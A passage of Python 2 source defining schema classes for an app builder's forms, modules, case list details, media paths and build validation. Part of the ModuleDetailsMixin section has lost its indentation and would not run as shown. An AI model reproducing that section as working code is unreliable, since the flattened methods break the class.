    """A string property that must hold a ``jr://`` resource path."""

    def validate(self, value, required=True):
        """Validate via StringProperty, then enforce the jr:// scheme.

        Returns the value unchanged; raises BadValueError otherwise.
        """
        super(JRResourceProperty, self).validate(value, required)
        if value is not None and not value.startswith('jr://'):
            # Fixed: the message previously had an unbalanced quote
            # ("...start with 'jr://").
            raise BadValueError("JR Resources must start with 'jr://'")
        return value
class NavMenuItemMediaMixin(DocumentSchema):
    """
    Language-specific icon and audio.
    Properties are map of lang-code to filepath
    """
    media_image = SchemaDictProperty(JRResourceProperty)
    media_audio = SchemaDictProperty(JRResourceProperty)

    @classmethod
    def wrap(cls, data):
        # ToDo - Remove after migration
        # Legacy docs stored a bare path string; wrap it as {'default': path}.
        for media_attr in ('media_image', 'media_audio'):
            old_media = data.get(media_attr, None)
            if old_media and isinstance(old_media, basestring):
                new_media = {'default': old_media}
                data[media_attr] = new_media
        return super(NavMenuItemMediaMixin, cls).wrap(data)

    def _get_media_by_language(self, media_attr, lang, strict=False):
        """
        Return media-path for given language if one exists, else 1st path in the
        sorted lang->media-path list

        *args:
            media_attr: one of 'media_image' or 'media_audio'
            lang: language code

        **kwargs:
            strict: whether to return None if media-path is not set for lang or
                    to return first path in sorted lang->media-path list
        """
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr)
        if not media_dict:
            return None
        if media_dict.get(lang, ''):
            return media_dict[lang]
        if not strict:
            # if the queried lang key doesn't exist,
            # return the first in the sorted list
            # (fix: throwaway name so the `lang` argument isn't shadowed)
            for _lang, item in sorted(media_dict.items()):
                return item

    @property
    def default_media_image(self):
        # For older apps that were migrated
        return self.icon_by_language('default')

    @property
    def default_media_audio(self):
        # For older apps that were migrated
        return self.audio_by_language('default')

    def icon_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_image', lang, strict=strict)

    def audio_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_audio', lang, strict=strict)

    def _set_media(self, media_attr, lang, media_path):
        """
        Caller's responsibility to save doc.
        Currently only called from the view which saves after all Edits
        """
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr) or {}
        # Empty path is stored as '' rather than dropped.
        media_dict[lang] = media_path or ''
        setattr(self, media_attr, media_dict)

    def set_icon(self, lang, icon_path):
        self._set_media('media_image', lang, icon_path)

    def set_audio(self, lang, audio_path):
        self._set_media('media_audio', lang, audio_path)

    def _all_media_paths(self, media_attr):
        # All distinct non-empty paths configured for this media type.
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr) or {}
        valid_media_paths = {media for media in media_dict.values() if media}
        return list(valid_media_paths)

    def all_image_paths(self):
        return self._all_media_paths('media_image')

    def all_audio_paths(self):
        return self._all_media_paths('media_audio')

    def icon_app_string(self, lang, for_default=False):
        """
        Return lang/app_strings.txt translation for given lang
        if a path exists for the lang

        **kwargs:
            for_default: whether app_string is for default/app_strings.txt
        """
        if not for_default and self.icon_by_language(lang, strict=True):
            return self.icon_by_language(lang, strict=True)

        if for_default:
            return self.icon_by_language(lang, strict=False)

    def audio_app_string(self, lang, for_default=False):
        """
        see note on self.icon_app_string
        """
        if not for_default and self.audio_by_language(lang, strict=True):
            return self.audio_by_language(lang, strict=True)

        if for_default:
            return self.audio_by_language(lang, strict=False)
class Form(IndexedFormBase, NavMenuItemMediaMixin):
    """A standard module form: case management configured via ``actions``."""
    form_type = 'module_form'

    form_filter = StringProperty()
    # Whether the form needs a case (or legacy referral) selected before entry.
    requires = StringProperty(choices=["case", "referral", "none"], default="none")
    actions = SchemaProperty(FormActions)

    def add_stuff_to_xform(self, xform, build_profile_id=None):
        super(Form, self).add_stuff_to_xform(xform, build_profile_id)
        # Inject the case-management blocks derived from self.actions.
        xform.add_case_and_meta(self)

    def all_other_forms_require_a_case(self):
        # True when every sibling form (excluding this one) requires a case.
        m = self.get_module()
        return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])

    def session_var_for_action(self, action):
        """Session variable name holding the case id a given action creates."""
        module_case_type = self.get_module().case_type
        if action == 'open_case':
            return 'case_id_new_{}_0'.format(module_case_type)
        if isinstance(action, OpenSubCaseAction):
            subcase_type = action.case_type
            subcase_index = self.actions.subcases.index(action)
            opens_case = 'open_case' in self.active_actions()
            if opens_case:
                # Subcase counters are offset by 1 when the form also opens
                # its own case.
                subcase_index += 1
            return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)

    def _get_active_actions(self, types):
        # Filter self.actions down to the given action types that are active
        # (non-empty lists, or single actions whose is_active() is true).
        actions = {}
        for action_type in types:
            a = getattr(self.actions, action_type)
            if isinstance(a, list):
                if a:
                    actions[action_type] = a
            elif a.is_active():
                actions[action_type] = a
        return actions

    def active_actions(self):
        # Which action types are even considered depends on the app version
        # and on what this form requires.
        if self.get_app().application_version == APP_V1:
            action_types = (
                'open_case', 'update_case', 'close_case',
                'open_referral', 'update_referral', 'close_referral',
                'case_preload', 'referral_preload'
            )
        else:
            if self.requires == 'none':
                action_types = (
                    'open_case', 'update_case', 'close_case', 'subcases',
                    'usercase_update', 'usercase_preload',
                )
            elif self.requires == 'case':
                action_types = (
                    'update_case', 'close_case', 'case_preload', 'subcases',
                    'usercase_update', 'usercase_preload', 'load_from_form',
                )
            else:
                # this is left around for legacy migrated apps
                action_types = (
                    'open_case', 'update_case', 'close_case',
                    'case_preload', 'subcases',
                    'usercase_update', 'usercase_preload',
                )
        return self._get_active_actions(action_types)

    def active_non_preloader_actions(self):
        return self._get_active_actions((
            'open_case', 'update_case', 'close_case',
            'open_referral', 'update_referral', 'close_referral'))

    def check_actions(self):
        """Return a list of error dicts for misconfigured case actions."""
        errors = []

        subcase_names = set()
        for subcase_action in self.actions.subcases:
            if not subcase_action.case_type:
                errors.append({'type': 'subcase has no case type'})

            subcase_names.update(subcase_action.case_properties)

        if self.requires == 'none' and self.actions.open_case.is_active() \
                and not self.actions.open_case.name_path:
            errors.append({'type': 'case_name required'})

        errors.extend(self.check_case_properties(
            all_names=self.actions.all_property_names(),
            subcase_names=subcase_names
        ))

        def generate_paths():
            # Flatten every question path referenced by any active action.
            for action in self.active_actions().values():
                if isinstance(action, list):
                    actions = action
                else:
                    actions = [action]
                for action in actions:
                    for path in FormAction.get_action_paths(action):
                        yield path

        errors.extend(self.check_paths(generate_paths()))

        return errors

    def requires_case(self):
        # all referrals also require cases
        return self.requires in ("case", "referral")

    def requires_case_type(self):
        return self.requires_case() or \
            bool(self.active_non_preloader_actions())

    def requires_referral(self):
        return self.requires == "referral"

    def uses_parent_case(self):
        """
        Returns True if any of the load/update properties references the
        parent case; False otherwise
        """
        return any([name.startswith('parent/')
                    for name in self.actions.all_property_names()])

    def get_registration_actions(self, case_type):
        """
        :return: List of actions that create a case. Subcase actions are included
                 as long as they are not inside a repeat. If case_type is not None
                 only return actions that create a case of the specified type.
        """
        reg_actions = []
        if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
            reg_actions.append('open_case')

        subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
        if case_type:
            subcase_actions = [a for a in subcase_actions if a.case_type == case_type]

        reg_actions.extend(subcase_actions)
        return reg_actions

    def is_registration_form(self, case_type=None):
        # A registration form creates exactly one case (of case_type if given).
        reg_actions = self.get_registration_actions(case_type)
        return len(reg_actions) == 1

    def uses_usercase(self):
        return actions_use_usercase(self.active_actions())

    def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
        errors = []
        if xml_valid:
            for error in self.check_actions():
                error.update(error_meta)
                errors.append(error)

        if validate_module:
            # Work out which module-level config this form's requirements imply.
            needs_case_type = False
            needs_case_detail = False
            needs_referral_detail = False

            if self.requires_case():
                needs_case_detail = True
                needs_case_type = True
            if self.requires_case_type():
                needs_case_type = True
            if self.requires_referral():
                needs_referral_detail = True

            errors.extend(self.get_module().get_case_errors(
                needs_case_type=needs_case_type,
                needs_case_detail=needs_case_detail,
                needs_referral_detail=needs_referral_detail,
            ))

        return errors

    def get_case_updates(self, case_type):
        # This method is used by both get_all_case_properties and
        # get_usercase_properties. In the case of usercase properties, use
        # the usercase_update action, and for normal cases, use the
        # update_case action
        if case_type == self.get_module().case_type or case_type == USERCASE_TYPE:
            format_key = self.get_case_property_name_formatter()
            action = self.actions.usercase_update if case_type == USERCASE_TYPE else self.actions.update_case
            return [format_key(*item) for item in action.update.items()]
        return []

    @memoized
    def get_subcase_types(self):
        '''
        Return the set of case types for which this Form opens a new subcase
        (only subcases whose close condition is "never").
        '''
        return {subcase.case_type for subcase in self.actions.subcases if subcase.close_condition.type == "never"}

    @memoized
    def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
        # Pair of (set of (parent type, relationship), set of case property
        # names) contributed by this form's subcase actions for `case_type`.
        parent_types = set()
        case_properties = set()
        for subcase in self.actions.subcases:
            if subcase.case_type == case_type:
                case_properties.update(
                    subcase.case_properties.keys()
                )
                if case_type != module_case_type and (
                        self.actions.open_case.is_active() or
                        self.actions.update_case.is_active() or
                        self.actions.close_case.is_active()):
                    parent_types.add((module_case_type, subcase.reference_id or 'parent'))
        return parent_types, case_properties

    def update_app_case_meta(self, app_case_meta):
        """Register this form's case opens/closes/saves/loads on the app meta."""
        from corehq.apps.reports.formdetails.readable import FormQuestionResponse
        questions = {
            q['value']: FormQuestionResponse(q)
            for q in self.get_questions(self.get_app().langs, include_triggers=True,
                                        include_groups=True, include_translations=True)
        }
        module_case_type = self.get_module().case_type
        type_meta = app_case_meta.get_type(module_case_type)
        for type_, action in self.active_actions().items():
            if type_ == 'open_case':
                type_meta.add_opener(self.unique_id, action.condition)
                self.add_property_save(
                    app_case_meta,
                    module_case_type,
                    'name',
                    questions,
                    action.name_path
                )
            if type_ == 'close_case':
                type_meta.add_closer(self.unique_id, action.condition)
            if type_ == 'update_case':
                for name, question_path in FormAction.get_action_properties(action):
                    self.add_property_save(
                        app_case_meta,
                        module_case_type,
                        name,
                        questions,
                        question_path
                    )
            if type_ == 'case_preload' or type_ == 'load_from_form':
                for name, question_path in FormAction.get_action_properties(action):
                    self.add_property_load(
                        app_case_meta,
                        module_case_type,
                        name,
                        questions,
                        question_path
                    )
            if type_ == 'subcases':
                for act in action:
                    if act.is_active():
                        sub_type_meta = app_case_meta.get_type(act.case_type)
                        sub_type_meta.add_opener(self.unique_id, act.condition)
                        if act.close_condition.is_active():
                            sub_type_meta.add_closer(self.unique_id, act.close_condition)
                        for name, question_path in FormAction.get_action_properties(act):
                            self.add_property_save(
                                app_case_meta,
                                act.case_type,
                                name,
                                questions,
                                question_path
                            )
class MappingItem(DocumentSchema):
    key = StringProperty()
    # lang => localized string
    value = DictProperty()

    @property
    def treat_as_expression(self):
        """
        Returns if whether the key can be treated as a valid expression that can be included in
        condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
        """
        special_chars = '{}()[]=<>."\'/'
        return any(special_char in self.key for special_char in special_chars)

    @property
    def key_as_variable(self):
        """
        Return an xml variable name to represent this key.

        If the key contains spaces or a condition-predicate of an if-clause,
        return a hash of the key with "h" prepended.
        If not, return the key with "k" prepended.

        The prepended characters prevent the variable name from starting with a
        numeral, which is illegal.
        """
        if ' ' in self.key or self.treat_as_expression:
            return 'h{hash}'.format(hash=hashlib.md5(self.key).hexdigest()[:8])
        else:
            return 'k{key}'.format(key=self.key)

    def key_as_condition(self, property):
        # Build an xpath condition: either the key itself treated as an
        # expression (dots interpolated against `property`), or a simple
        # equality test against the key string.
        if self.treat_as_expression:
            condition = dot_interpolate(self.key, property)
            return u"{condition}".format(condition=condition)
        else:
            return u"{property} = '{key}'".format(
                property=property,
                key=self.key
            )

    def ref_to_key_variable(self, index, sort_or_display):
        # NOTE(review): any value other than "sort"/"display" leaves
        # key_as_var unbound and raises UnboundLocalError — confirm callers
        # only ever pass these two strings.
        if sort_or_display == "sort":
            key_as_var = "{}, ".format(index)
        elif sort_or_display == "display":
            key_as_var = "${var_name}, ".format(var_name=self.key_as_variable)

        return key_as_var
class GraphAnnotations(IndexedSchema):
    # A text annotation pinned at (x, y) on a graph; text localized by lang.
    display_text = DictProperty()
    x = StringProperty()
    y = StringProperty()
class GraphSeries(DocumentSchema):
    # One data series on a graph; the *_function fields hold expressions
    # evaluated against data_path.
    config = DictProperty()
    locale_specific_config = DictProperty()
    data_path = StringProperty()
    x_function = StringProperty()
    y_function = StringProperty()
    radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
    # Graph display config: type, series, annotations and raw config maps.
    config = DictProperty()
    locale_specific_config = DictProperty()
    annotations = SchemaListProperty(GraphAnnotations)
    graph_type = StringProperty()
    series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
    """
    Represents a tab in the case detail screen on the phone.
    Each tab is itself a detail, nested inside the app's "main" detail.
    """
    header = DictProperty()

    # The first index, of all fields in the parent detail, that belongs to this tab
    starting_index = IntegerProperty()

    # A tab may be associated with a nodeset, resulting in a detail that
    # iterates through sub-nodes of an entity rather than a single entity
    has_nodeset = BooleanProperty(default=False)
    nodeset = StringProperty()
class DetailColumn(IndexedSchema):
    """
    Represents a column in case selection screen on the phone. Ex:
        {
            'header': {'en': 'Sex', 'por': 'Sexo'},
            'model': 'case',
            'field': 'sex',
            'format': 'enum',
            'xpath': '.',
            'enum': [
                {'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
                {'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
            ],
        }
    """
    header = DictProperty()
    model = StringProperty()
    field = StringProperty()
    format = StringProperty()

    enum = SchemaListProperty(MappingItem)
    graph_configuration = SchemaProperty(GraphConfiguration)
    case_tile_field = StringProperty()

    late_flag = IntegerProperty(default=30)
    advanced = StringProperty(default="")
    calc_xpath = StringProperty(default=".")
    filter_xpath = StringProperty(default="")
    time_ago_interval = FloatProperty(default=365.25)

    @property
    def enum_dict(self):
        """for backwards compatibility with building 1.0 apps"""
        import warnings
        warnings.warn('You should not use enum_dict. Use enum instead',
                      DeprecationWarning)
        return dict((item.key, item.value) for item in self.enum)

    def rename_lang(self, old_lang, new_lang):
        # Rename the language key in the header and in every enum value.
        for dct in [self.header] + [item.value for item in self.enum]:
            _rename_key(dct, old_lang, new_lang)

    @property
    def field_type(self):
        # "type:property" prefix, defaulting to plain 'property'.
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[0]
        else:
            return 'property'  # equivalent to property:parent/case_property

    @property
    def field_property(self):
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[1]
        else:
            return self.field

    class TimeAgoInterval(object):
        # Day counts used to convert legacy "-ago" formats into an interval.
        map = {
            'day': 1.0,
            'week': 7.0,
            'month': 30.4375,
            'year': 365.25
        }

        @classmethod
        def get_from_old_format(cls, format):
            # Legacy formats only; any other value falls through (None).
            if format == 'years-ago':
                return cls.map['year']
            elif format == 'months-ago':
                return cls.map['month']

    @classmethod
    def wrap(cls, data):
        # Lazy migration: convert legacy "-ago" formats to time-ago+interval.
        if data.get('format') in ('months-ago', 'years-ago'):
            data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
            data['format'] = 'time-ago'

        # Lazy migration: enum used to be a dict, now is a list
        # NOTE(review): sorting dicts relies on Python 2 comparison semantics.
        if isinstance(data.get('enum'), dict):
            data['enum'] = sorted({'key': key, 'value': value}
                                  for key, value in data['enum'].items())

        return super(DetailColumn, cls).wrap(data)

    @classmethod
    def from_json(cls, data):
        from corehq.apps.app_manager.views.media_utils import interpolate_media_path

        to_ret = cls.wrap(data)
        if to_ret.format == 'enum-image':
            # interpolate icons-paths
            for item in to_ret.enum:
                for lang, path in item.value.iteritems():
                    item.value[lang] = interpolate_media_path(path)
        return to_ret
class SortElement(IndexedSchema):
    # Sort configuration for a case list column: field, type and direction.
    field = StringProperty()
    type = StringProperty()
    direction = StringProperty()
class SortOnlyDetailColumn(DetailColumn):
    """This is a mock type, not intended to be part of a document"""

    @property
    def _i(self):
        """
        assert that SortOnlyDetailColumn never has ._i or .id called
        since it should never be in an app document
        """
        raise NotImplementedError()
class CaseListLookupMixin(DocumentSchema):
    """
    Allows for the addition of Android Callouts to do lookups from the CaseList

        <lookup action="" image="" name="">
            <extra key="" value="" />
            <response key="" />
            <field>
                <header><text><locale id=""/></text></header>
                <template><text><xpath function=""/></text></template>
            </field>
        </lookup>
    """
    lookup_enabled = BooleanProperty(default=False)
    lookup_action = StringProperty()
    lookup_name = StringProperty()
    lookup_image = JRResourceProperty(required=False)

    lookup_extras = SchemaListProperty()
    lookup_responses = SchemaListProperty()

    lookup_display_results = BooleanProperty(default=False)  # Display callout results in case list?
    lookup_field_header = DictProperty()
    lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
    """
    Full configuration for a case selection screen
    """
    display = StringProperty(choices=['short', 'long'])

    columns = SchemaListProperty(DetailColumn)
    get_columns = IndexedSchema.Getter('columns')

    tabs = SchemaListProperty(DetailTab)
    get_tabs = IndexedSchema.Getter('tabs')

    sort_elements = SchemaListProperty(SortElement)
    filter = StringProperty()

    # If True, a small tile will display the case name after selection.
    persist_case_context = BooleanProperty()

    # If True, use case tiles in the case list
    use_case_tiles = BooleanProperty()
    # If given, use this string for the case tile markup instead of the default template
    custom_xml = StringProperty()
    persist_tile_on_forms = BooleanProperty()
    # If True, the in form tile can be pulled down to reveal all the case details.
    pull_down_tile = BooleanProperty()

    def get_tab_spans(self):
        '''
        Return the starting and ending indices into self.columns deliminating
        the columns that should be in each tab.
        :return:
        '''
        tabs = list(self.get_tabs())
        ret = []
        for tab in tabs:
            try:
                # A tab's span ends where the next tab begins...
                end = tabs[tab.id + 1].starting_index
            except IndexError:
                # ...and the last tab runs to the end of the column list.
                end = len(self.columns)
            ret.append((tab.starting_index, end))
        return ret

    @parse_int([1])
    def get_column(self, i):
        return self.columns[i].with_id(i % len(self.columns), self)

    def rename_lang(self, old_lang, new_lang):
        for column in self.columns:
            column.rename_lang(old_lang, new_lang)
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
    # Localized label and visibility flag for the case list menu item.
    label = DictProperty()
    show = BooleanProperty(default=False)

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)
class CaseSearchProperty(DocumentSchema):
    """
    Case properties available to search on.
    """
    name = StringProperty()
    label = DictProperty()
class CaseSearch(DocumentSchema):
    """
    Properties and search command label
    """
    # NOTE(review): mutable dict default — presumably DictProperty copies
    # its default per document; confirm in the schema framework.
    command_label = DictProperty(default={'en': 'Search All Cases'})
    properties = SchemaListProperty(CaseSearchProperty)
class ParentSelect(DocumentSchema):
    # Config for selecting a related (parent) case before the module's own.
    active = BooleanProperty(default=False)
    relationship = StringProperty(default='parent')
    module_id = StringProperty()
class FixtureSelect(DocumentSchema):
    """
    Configuration for creating a details screen from a fixture which can be used to pre-filter
    cases prior to displaying the case list.

    fixture_type:       FixtureDataType.tag
    display_column:     name of the column to display in the list
    localize:           boolean if display_column actually contains the key for the localized string
    variable_column:    name of the column whose value should be saved when the user selects an item
    xpath:              xpath expression to use as the case filter
    """
    active = BooleanProperty(default=False)
    fixture_type = StringProperty()
    display_column = StringProperty()
    localize = BooleanProperty(default=False)
    variable_column = StringProperty()
    xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
    # The short (case list) and long (case detail) screens for one entity.
    short = SchemaProperty(Detail)
    long = SchemaProperty(Detail)

    @classmethod
    def wrap(cls, data):
        # Force the display discriminator on both halves after wrapping.
        self = super(DetailPair, cls).wrap(data)
        self.short.display = 'short'
        self.long.display = 'long'
        return self
class CaseListForm(NavMenuItemMediaMixin):
    # Registration form reachable from the case list, with localized label.
    form_id = FormIdProperty('modules[*].case_list_form.form_id')
    label = DictProperty()

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)
class ModuleBase(IndexedSchema, NavMenuItemMediaMixin, CommentMixin):
    """Shared behavior for all module types (a named group of forms)."""
    name = DictProperty(unicode)
    unique_id = StringProperty()
    case_type = StringProperty()
    case_list_form = SchemaProperty(CaseListForm)
    module_filter = StringProperty()
    root_module_id = StringProperty()
    fixture_select = SchemaProperty(FixtureSelect)
    auto_select_case = BooleanProperty(default=False)

    @classmethod
    def wrap(cls, data):
        # Polymorphic wrap: dispatch to the concrete module class by doc_type.
        if cls is ModuleBase:
            doc_type = data['doc_type']
            if doc_type == 'Module':
                return Module.wrap(data)
            elif doc_type == 'CareplanModule':
                return CareplanModule.wrap(data)
            elif doc_type == 'AdvancedModule':
                return AdvancedModule.wrap(data)
            elif doc_type == 'ReportModule':
                return ReportModule.wrap(data)
            elif doc_type == 'ShadowModule':
                return ShadowModule.wrap(data)
            else:
                raise ValueError('Unexpected doc_type for Module', doc_type)
        else:
            return super(ModuleBase, cls).wrap(data)

    def get_or_create_unique_id(self):
        """
        It is the caller's responsibility to save the Application
        after calling this function.

        WARNING: If called on the same doc in different requests without saving,
        this function will return a different uuid each time,
        likely causing unexpected behavior
        """
        if not self.unique_id:
            self.unique_id = random_hex()
        return self.unique_id

    get_forms = IndexedSchema.Getter('forms')
    get_suite_forms = IndexedSchema.Getter('forms')

    @parse_int([1])
    def get_form(self, i):
        try:
            return self.forms[i].with_id(i % len(self.forms), self)
        except IndexError:
            raise FormNotFoundException()

    def get_child_modules(self):
        # Modules that declare this module as their root (submenu children).
        return [
            module for module in self.get_app().get_modules()
            if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
        ]

    @property
    def root_module(self):
        # None when this module has no root (returns None implicitly).
        if self.root_module_id:
            return self._parent.get_module_by_unique_id(self.root_module_id)

    def requires_case_details(self):
        return False

    def get_case_types(self):
        return set([self.case_type])

    def get_module_info(self):
        return {
            'id': self.id,
            'name': self.name,
        }

    def get_app(self):
        return self._parent

    def default_name(self):
        app = self.get_app()
        return trans(
            self.name,
            [app.default_language] + app.langs,
            include_lang=False
        )

    def rename_lang(self, old_lang, new_lang):
        # Rename the language key on the module name, its forms and details.
        _rename_key(self.name, old_lang, new_lang)
        for form in self.get_forms():
            form.rename_lang(old_lang, new_lang)
        for _, detail, _ in self.get_details():
            detail.rename_lang(old_lang, new_lang)

    def validate_detail_columns(self, columns):
        from corehq.apps.app_manager.suite_xml.const import FIELD_TYPE_LOCATION
        from corehq.apps.locations.util import parent_child
        hierarchy = None
        for column in columns:
            if column.field_type == FIELD_TYPE_LOCATION:
                # Fetch the location hierarchy lazily, only if needed.
                hierarchy = hierarchy or parent_child(self.get_app().domain)
                try:
                    LocationXpath('').validate(column.field_property, hierarchy)
                except LocationXpathValidationError, e:
                    yield {
                        'type': 'invalid location xpath',
                        'details': unicode(e),
                        'module': self.get_module_info(),
                        'column': column,
                    }

    def get_form_by_unique_id(self, unique_id):
        # Returns None when no form matches.
        for form in self.get_forms():
            if form.get_unique_id() == unique_id:
                return form

    def validate_for_build(self):
        """Collect build-blocking errors for this module."""
        errors = []
        if self.requires_case_details():
            errors.extend(self.get_case_errors(
                needs_case_type=True,
                needs_case_detail=True
            ))
        if self.case_list_form.form_id:
            try:
                form = self.get_app().get_form(self.case_list_form.form_id)
            except FormNotFoundException:
                errors.append({
                    'type': 'case list form missing',
                    'module': self.get_module_info()
                })
            else:
                if not form.is_registration_form(self.case_type):
                    errors.append({
                        'type': 'case list form not registration',
                        'module': self.get_module_info(),
                        'form': form,
                    })
        if self.module_filter:
            is_valid, message = validate_xpath(self.module_filter)
            if not is_valid:
                errors.append({
                    'type': 'module filter has xpath error',
                    'xpath_error': message,
                    'module': self.get_module_info(),
                })

        return errors

    @memoized
    def get_subcase_types(self):
        '''
        Return a set of each case type for which this module has a form that
        opens a new subcase of that type.
        '''
        subcase_types = set()
        for form in self.get_forms():
            if hasattr(form, 'get_subcase_types'):
                subcase_types.update(form.get_subcase_types())
        return subcase_types

    def get_custom_entries(self):
        """
        By default, suite entries are configured by forms, but you can also provide custom
        entries by overriding this function.

        See ReportModule for an example
        """
        return []

    def uses_media(self):
        """
        Whether the module uses media. If this returns false then media will not be generated
        for the module.
        """
        return True

    def uses_usercase(self):
        return False
class ModuleDetailsMixin():
@classmethod
def wrap_details(cls, data):
    # Legacy migration: 'details' used to be a flat 4-tuple of screens;
    # split it into case_details / ref_details pairs.  The old key is
    # always dropped (finally), even when unpacking fails.
    if 'details' in data:
        try:
            case_short, case_long, ref_short, ref_long = data['details']
        except ValueError:
            # "need more than 0 values to unpack"
            pass
        else:
            data['case_details'] = {
                'short': case_short,
                'long': case_long,
            }
            data['ref_details'] = {
                'short': ref_short,
                'long': ref_long,
            }
        finally:
            del data['details']
    return data
@property
def case_list_filter(self):
    # Filter xpath configured on the short case detail, if any.
    try:
        return self.case_details.short.filter
    except AttributeError:
        return None
@property
def detail_sort_elements(self):
    # NOTE(review): broad except presumably guards legacy docs missing the
    # attribute chain — confirm which exception this is meant to swallow.
    try:
        return self.case_details.short.sort_elements
    except Exception:
        return []
def rename_lang(self, old_lang, new_lang):
    # NOTE: super(Module, ...) — this mixin is written to be mixed into the
    # Module class specifically; it also expects case_list/referral_list.
    super(Module, self).rename_lang(old_lang, new_lang)
    for case_list in (self.case_list, self.referral_list):
        case_list.rename_lang(old_lang, new_lang)
def export_json(self, dump_json=True, keep_unique_id=False):
source = self.to_json()
if not keep_unique_id:
for form in source['forms']:
del form['unique_id']
return json.dumps(source) if dump_json else source
def get_details(self):
return (
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('ref_short', self.ref_details.short, False),
('ref_long', self.ref_details.long, False),
)
def validate_details_for_build(self):
errors = []
for sort_element in self.detail_sort_elements:
try:
validate_detail_screen_field(sort_element.field)
except ValueError:
errors.append({
'type': 'invalid sort field',
'field': sort_element.field,
'module': self.get_module_info(),
})
if self.case_list_filter:
try:
case_list_filter = interpolate_xpath(self.case_list_filter)
etree.XPath(case_list_filter)
except (etree.XPathSyntaxError, CaseXPathValidationError):
errors.append({
'type': 'invalid filter xpath',
'module': self.get_module_info(),
'filter': self.case_list_filter,
})
for detail in [self.case_details.short, self.case_details.long]:
if detail.use_case_tiles:
if not detail.display == "short":
errors.append({
'type': "invalid tile configuration",
'module': self.get_module_info(),
'reason': _('Case tiles may only be used for the case list (not the case details).')
})
col_by_tile_field = {c.case_tile_field: c for c in detail.columns}
for field in ["header", "top_left", "sex", "bottom_left", "date"]:
if field not in col_by_tile_field:
errors.append({
'type': "invalid tile configuration",
'module': self.get_module_info(),
'reason': _('A case property must be assigned to the "{}" tile field.'.format(field))
})
return errors
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.case_details.short.columns:
yield {
'type': 'no case detail',
'module': module_info,
}
columns = self.case_details.short.columns + self.case_details.long.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
if needs_referral_detail and not self.ref_details.short.columns:
yield {
'type': 'no ref detail',
'module': module_info,
}
class Module(ModuleBase, ModuleDetailsMixin):
    """
    A group of related forms, and configuration that applies to them all.
    Translates to a top-level menu on the phone.
    """
    module_type = 'basic'
    case_label = DictProperty()
    referral_label = DictProperty()
    forms = SchemaListProperty(Form)
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    put_in_root = BooleanProperty(default=False)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)
    search_config = SchemaProperty(CaseSearch)

    @classmethod
    def wrap(cls, data):
        # Apply the legacy 'details' -> case/ref details migration first.
        data = cls.wrap_details(data)
        return super(Module, cls).wrap(data)

    @classmethod
    def new_module(cls, name, lang):
        """Create a basic module with a default "Name" column on both details."""
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = Module(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            forms=[],
            case_type='',
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
            case_label={(lang or 'en'): 'Cases'},
        )
        module.get_or_create_unique_id()
        return module

    def new_form(self, name, lang, attachment=''):
        """Append a new form and return it with its source attached."""
        form = Form(
            name={lang if lang else "en": name if name else _("Untitled Form")},
        )
        self.forms.append(form)
        # Re-fetch via get_form so the returned object is the schema-wrapped
        # child (presumably with _parent set) — not the detached instance.
        form = self.get_form(-1)
        form.source = attachment
        return form

    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """Insert ``form`` at ``index`` (append when ``index`` is None).

        Accepts a ``Form`` directly, or an ``AdvancedForm`` with no actions
        (which is converted to a basic ``Form``); any other form type raises
        ``IncompatibleFormTypeException``. Returns the inserted form.
        """
        if isinstance(form, Form):
            new_form = form
        elif isinstance(form, AdvancedForm) and not form.actions.get_all_actions():
            new_form = Form(
                name=form.name,
                form_filter=form.form_filter,
                media_image=form.media_image,
                media_audio=form.media_audio
            )
            new_form._parent = self
            form._parent = self
            if with_source:
                new_form.source = form.source
        else:
            raise IncompatibleFormTypeException()

        if index is not None:
            self.forms.insert(index, new_form)
        else:
            self.forms.append(new_form)
        # Bug fix: `index or -1` returned the *last* form when index == 0,
        # even though the form was correctly inserted at position 0.
        return self.get_form(index if index is not None else -1)

    def validate_for_build(self):
        """Combine base and detail validation; require forms or a case list."""
        errors = super(Module, self).validate_for_build() + self.validate_details_for_build()
        if not self.forms and not self.case_list.show:
            errors.append({
                'type': 'no forms or case list',
                'module': self.get_module_info(),
            })
        return errors

    def requires(self):
        """Return the strongest requirement among this module's forms.

        Precedence is 'referral' > 'case' > 'none'; the case list and
        referral list settings contribute 'case'/'referral' respectively.
